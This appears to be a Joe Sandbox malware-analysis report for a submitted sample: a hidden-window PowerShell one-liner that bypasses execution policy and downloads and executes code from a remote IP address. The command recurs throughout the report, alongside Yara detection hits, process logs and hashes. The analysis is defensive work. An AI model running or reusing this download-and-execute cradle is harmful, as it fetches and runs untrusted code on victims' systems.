ID: 293499 Cookbook: urldownload.jbs Time: 00:36:25 Date: 06/10/2020 Version: 30.0.0 Red Diamond Table of Contents
Table of Contents 2 Analysis Report http://powershell.exe -executionpolicy bypass -noprofile - windowstyle hidden "(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Startup 4 Malware Configuration 4 Yara Overview 4 Dropped Files 4 Memory Dumps 4 Sigma Overview 5 Signature Overview 5 Mitre Att&ck Matrix 6 Behavior Graph 6 Screenshots 7 Thumbnails 7 Antivirus, Machine Learning and Genetic Malware Detection 8 Initial Sample 8 Dropped Files 8 Unpacked PE Files 8 Domains 8 URLs 8 Domains and IPs 9 Contacted Domains 9 URLs from Memory and Binaries 9 Contacted IPs 9 Public 9 General Information 10 Simulations 10 Behavior and APIs 10 Joe Sandbox View / Context 10 IPs 10 Domains 11 ASN 11 JA3 Fingerprints 11 Dropped Files 11 Created / dropped Files 11 Static File Info 11 No static file info 11 Network Behavior 11 Code Manipulations 11 Statistics 11 Behavior 11 System Behavior 12 Analysis Process: cmd.exe PID: 3844 Parent PID: 2216 12 General 12 File Activities 12 File Created 12 Analysis Process: conhost.exe PID: 6000 Parent PID: 3844 12 General 12
Copyright null 2020 Page 2 of 13 Analysis Process: wget.exe PID: 6600 Parent PID: 3844 13 General 13 File Activities 13 Disassembly 13 Code Analysis 13
Copyright null 2020 Page 3 of 13 Analysis Report http://powershell.exe -executionpolicy …bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex
Overview
General Information Detection Signatures Classification
Sample URL: powershell.exe -exec utionpolicy bypass - YYaarrraa ssiiiggnnaatttuurrree maatttcchh noprofile -windowstyle hidd Yara signature match en "(New-Object System.N et.WebClient).DownloadStr ing('http://89.45.4.135:80/) Ransomware
| iex Miner Spreading Analysis ID: 293499 mmaallliiiccciiioouusss
malicious
Most interesting Screenshot: Evader Phishing sssuusssppiiiccciiioouusss
suspicious
cccllleeaann
clean
Exploiter Banker
Spyware Trojan / Bot
Adware
Score: 0 Range: 0 - 100 Whitelisted: false Confidence: 100%
Startup
System is w10x64 cmd.exe (PID: 3844 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-ag ent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden %22(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex' > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) wget.exe (PID: 6600 cmdline: wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden %22(New-Object System.Net.WebClient).Downloa dString('http://89.45.4.135:80/) | iex' MD5: 3DADB6E2ECE9C4B3E1E322E617658B60) cleanup
Malware Configuration
No configs have been found
Yara Overview
Dropped Files
Source Rule Description Author Strings C:\Users\user\Desktop\cmdline.out Suspicious_PowerShell_W Detects suspicious Florian Roth 0xc7:$s2: system.net.webclient).downloadstring('http ebDownload_1 PowerShell code 0x16e:$s2: system.net.webclient).downloadstring('http that downloads 0x1ed:$s2: system.net.webclient).downloadstring('http from web sites
Memory Dumps
Source Rule Description Author Strings 00000002.00000002.648721925.00000000009C Suspicious_PowerShell_W Detects suspicious Florian Roth 0x1e17:$s2: system.net.webclient).downloadstring('http C000.00000004.00000010.sdmp ebDownload_1 PowerShell code that downloads from web sites
Copyright null 2020 Page 4 of 13 Source Rule Description Author Strings 00000002.00000002.648747773.0000000000B3 Suspicious_PowerShell_W Detects suspicious Florian Roth 0x111d:$s2: System.Net.WebClient).DownloadString('h 6000.00000004.00000040.sdmp ebDownload_1 PowerShell code ttp that downloads 0x13dc:$s2: System.Net.WebClient).DownloadString('h from web sites ttp 0x147b:$s2: system.net.webclient).downloadstring('http 0x1544:$s2: System.Net.WebClient).DownloadString('h ttp 0x16fa:$s2: system.net.webclient).downloadstring('http 0x17ba:$s2: System.Net.WebClient).DownloadString('h ttp 0x1863:$s2: system.net.webclient).downloadstring('http 0x1917:$s2: system.net.webclient).downloadstring('http 0x19e2:$s2: system.net.webclient).downloadstring('http 0x1ac3:$s2: system.net.webclient).downloadstring('http 0x1b62:$s2: system.net.webclient).downloadstring('http 0x2133:$s2: system.net.webclient).downloadstring('http 0x2343:$s2: system.net.webclient).downloadstring('http 0x23c2:$s2: system.net.webclient).downloadstring('http 0x4d84:$s2: system.net.webclient).downloadstring('http 00000002.00000002.648737499.0000000000B3 Suspicious_PowerShell_W Detects suspicious Florian Roth 0x258d:$s2: System.Net.WebClient).DownloadString('h 0000.00000004.00000040.sdmp ebDownload_1 PowerShell code ttp that downloads 0x2784:$s2: System.Net.WebClient).DownloadString('h from web sites ttp 0x290c:$s2: System.Net.WebClient).DownloadString('h ttp 00000002.00000002.648770155.0000000000D5 Suspicious_PowerShell_W Detects suspicious Florian Roth 0x3a6b:$s2: System.Net.WebClient).DownloadString('h 0000.00000004.00000020.sdmp ebDownload_1 PowerShell code ttp that downloads from web sites Process Memory Space: wget.exe PID: 6600 Suspicious_PowerShell_W Detects suspicious Florian Roth 0x7e3:$s2: System.Net.WebClient).DownloadString('htt ebDownload_1 PowerShell code p that downloads 0x943:$s2: System.Net.WebClient).DownloadString('htt from web sites p 0xd11:$s2: system.net.webclient).downloadstring('http 0x1172:$s2: system.net.webclient).downloadstring('http 0x131e:$s2: system.net.webclient).downloadstring('http 0x46d7:$s2: System.Net.WebClient).DownloadString('h ttp 0x4837:$s2: System.Net.WebClient).DownloadString('h ttp 0x5103:$s2: System.Net.WebClient).DownloadString('h ttp 0x6ac2:$s2: System.Net.WebClient).DownloadString('h ttp 0x6c28:$s2: System.Net.WebClient).DownloadString('h ttp 0x6daa:$s2: System.Net.WebClient).DownloadString('h ttp 0x6efe:$s2: System.Net.WebClient).DownloadString('ht tp 0x92d6f:$s2: system.net.webclient).downloadstring('htt p 0x935e6:$s2: System.Net.WebClient).DownloadString(' http 0x93783:$s2: System.Net.WebClient).DownloadString(' http 0x937ef:$s2: System.Net.WebClient).DownloadString(' http 0x9388c:$s2: system.net.webclient).downloadstring('htt p 0x9392a:$s2: system.net.webclient).downloadstring('htt p 0x93a1e:$s2: System.Net.WebClient).DownloadString(' http 0x93afe:$s2: system.net.webclient).downloadstring('htt p 0x93bd1:$s2: system.net.webclient).downloadstring('htt p
Sigma Overview
No Sigma rule has matched
Signature Overview
Copyright null 2020 Page 5 of 13 • Networking • System Summary • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion
Click to jump to signature section
There are no malicious signatures, click here to show all signatures .
Mitre Att&ck Matrix
Command Remote Initial Privilege Defense Credential Lateral and Network Service Access Execution Persistence Escalation Evasion Access Discovery Movement Collection Exfiltration Control Effects Effects Impact Valid Windows Path Process Masquerading 1 OS Security Remote Data from Exfiltration Data Eavesdrop on Remotely Modify Accounts Management Interception Injection 1 Credential Software Services Local Over Other Obfuscation Insecure Track Device System Instrumentation Dumping Discovery 1 System Network Network Without Partition Medium Communication Authorization Default Scheduled Boot or Boot or Process LSASS System Remote Data from Exfiltration Junk Data Exploit SS7 to Remotely Device Accounts Task/Job Logon Logon Injection 1 Memory Information Desktop Removable Over Redirect Phone Wipe Data Lockout Initialization Initialization Discovery 1 Protocol Media Bluetooth Calls/SMS Without Scripts Scripts Authorization
Behavior Graph
Copyright null 2020 Page 6 of 13 Hide Legend Legend: Process Behavior Graph Signature ID: 293499 Created File URL: http://powershell.exe -exec... DNS/IP Info Startdate: 06/10/2020 Is Dropped Architecture: WINDOWS Is Windows Process Score: 0 Number of created Registry Values
Number of created Files started Visual Basic
Delphi cmd.exe Java
.Net C# or VB.NET
2 C, C++ or other language
Is malicious
Internet
89.45.4.135 M247GB started started Romania
wget.exe conhost.exe
1
Screenshots
Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Copyright null 2020 Page 7 of 13 Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
No Antivirus matches
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
Source Detection Scanner Label Link powershell.exe%20-executionpolicy%20bypass%20-noprofile%20- 0% Avira URL Cloud safe windowstyle%20hidden%20%22(new-obj 89.45.4.135:80/)%20%7C%20iexofil 0% Avira URL Cloud safe 89.45.4.135:80/) 0% Avira URL Cloud safe 89.45.4.135:80/)%20%7C%20iex 0% Avira URL Cloud safe
Copyright null 2020 Page 8 of 13 Source Detection Scanner Label Link powershell.exe 0% Avira URL Cloud safe
Domains and IPs
Contacted Domains
No contacted domains info
URLs from Memory and Binaries
Name Source Malicious Antivirus Detection Reputation powershell.exe%20-executionpolicy%20bypass%20- wget.exe, 00000002.00000002.64 false Avira URL Cloud: safe low noprofile%20-windowstyle%20hidden%20%22(new-obj 8747773.0000000000B36000.00000 004.00000040.sdmp, cmdline.out.2.dr 89.45.4.135:80/)%20%7C%20iexofil wget.exe, 00000002.00000002.64 false Avira URL Cloud: safe unknown 8747773.0000000000B36000.00000 004.00000040.sdmp 89.45.4.135:80/) wget.exe, 00000002.00000002.64 false Avira URL Cloud: safe unknown 8747773.0000000000B36000.00000 004.00000040.sdmp 89.45.4.135:80/)%20%7C%20iex wget.exe, 00000002.00000002.64 false Avira URL Cloud: safe unknown 8747773.0000000000B36000.00000 004.00000040.sdmp powershell.exe wget.exe, 00000002.00000002.64 false Avira URL Cloud: safe unknown 8737499.0000000000B30000.00000 004.00000040.sdmp, wget.exe, 0 0000002.00000002.648747773.000 0000000B36000.00000004.0000004 0.sdmp
Contacted IPs
No. of IPs < 25%
25% < No. of IPs < 50% 50% < No. of IPs < 75%
75% < No. of IPs
Public
IP Country Flag ASN ASN Name Malicious 89.45.4.135 Romania 9009 M247GB false
Copyright null 2020 Page 9 of 13 General Information
Joe Sandbox Version: 30.0.0 Red Diamond Analysis ID: 293499 Start date: 06.10.2020 Start time: 00:36:25 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 1m 54s Hypervisor based Inspection enabled: false Report type: light Cookbook file name: urldownload.jbs Sample URL: powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClie nt).DownloadString('http://89.45.4.135:80/) | iex Analysis system description: w10x64 Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 4 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: CLEAN Classification: clean0.win@4/1@0/1 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Unable to download file Warnings: Show All Exclude process from analysis (whitelisted): taskhostw.exe VT rate limit hit for: http://powershell.exe - executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadString('http://89.4 5.4.135:80/) | iex
Simulations
Behavior and APIs
No simulations
Joe Sandbox View / Context
IPs
No context
Copyright null 2020 Page 10 of 13 Domains
No context
ASN
No context
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
C:\Users\user\Desktop\cmdline.out Process: C:\Windows\SysWOW64\wget.exe File Type: ASCII text, with CRLF line terminators Size (bytes): 741 Entropy (8bit): 4.929920046548217 Encrypted: false MD5: 36EAC5BF6D3352902F0B2170324B3F57 SHA1: 293ABA428298A73220CBA408B32101EFF9F0C2B7 SHA-256: 4F5F363CB62D03934BF6982DB0E2A0992F9E0AD29363833626B0CD0F45B11C91 SHA-512: 0B5F82CC554F039478A903DD1278FC04EF284EEBEDCB8ADC7EE900D3C036C90E2899F92ECA0C3D612AAAD482EDBFEF1092EC50D92CE935BE3FA5A518902F23 59 Malicious: false Yara Hits: Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: C:\Users\user\Desktop\cmdline.out, Author: Florian Roth Reputation: low Preview: idn_encode failed (-206): 'domain label longer than 63 characters'..--2020-10-06 00:37:13-- http://powershell.exe%20-executionpolicy%20bypass%20-noprofile%20-w indowstyle%20hidden%20%22(new-object%20system.net.webclient).downloadstring('http//89.45.4.135:80/)%20%7C%20iex..Resolving powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(new-object system.net.webclient).downloadstring('http (powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden " (new-object system.net.webclient).downloadstring('http)... failed: No such host is known. ...wget: unable to resolve host address 'powershell.exe -executionpolicy bypass - noprofile -windowstyle hidden "(new-object system.net.webclient).downloadstring(\'http'..
Static File Info
No static file info
Network Behavior
No network behavior found
Code Manipulations
Statistics
Behavior
Copyright null 2020 Page 11 of 13 • cmd.exe • conhost.exe • wget.exe
Click to jump to process
System Behavior
Analysis Process: cmd.exe PID: 3844 Parent PID: 2216
General
Start time: 00:37:11 Start date: 06/10/2020 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no -check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://powershell.exe -executionpolicy bypass -noprofile - windowstyle hidden %22(New-Object System.Net.WebClient).DownloadString('http://89. 45.4.135:80/) | iex' > cmdline.out 2>&1 Imagebase: 0x11d0000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: low
File Activities
File Created
Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\Desktop\cmdline.out read attributes | device synchronous io success or wait 1 11DD194 CreateFileW synchronize | non alert | non generic write directory file
Analysis Process: conhost.exe PID: 6000 Parent PID: 3844
General
Start time: 00:37:11 Start date: 06/10/2020 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff724c50000 Copyright null 2020 Page 12 of 13 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: low
Analysis Process: wget.exe PID: 6600 Parent PID: 3844
General
Start time: 00:37:12 Start date: 06/10/2020 Path: C:\Windows\SysWOW64\wget.exe Wow64 process (32bit): true Commandline: wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-d isposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden %22 (New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex' Imagebase: 0x400000 File size: 3895184 bytes MD5 hash: 3DADB6E2ECE9C4B3E1E322E617658B60 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Yara matches: Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000002.00000002.648721925.00000000009CC000.00000004.00000010.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000002.00000002.648747773.0000000000B36000.00000004.00000040.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000002.00000002.648737499.0000000000B30000.00000004.00000040.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000002.00000002.648770155.0000000000D50000.00000004.00000020.sdmp, Author: Florian Roth Reputation: low
File Activities
Source File Path Access Attributes Options Completion Count Address Symbol
Source File Path Offset Length Value Ascii Completion Count Address Symbol
Disassembly
Code Analysis
Copyright null 2020 Page 13 of 13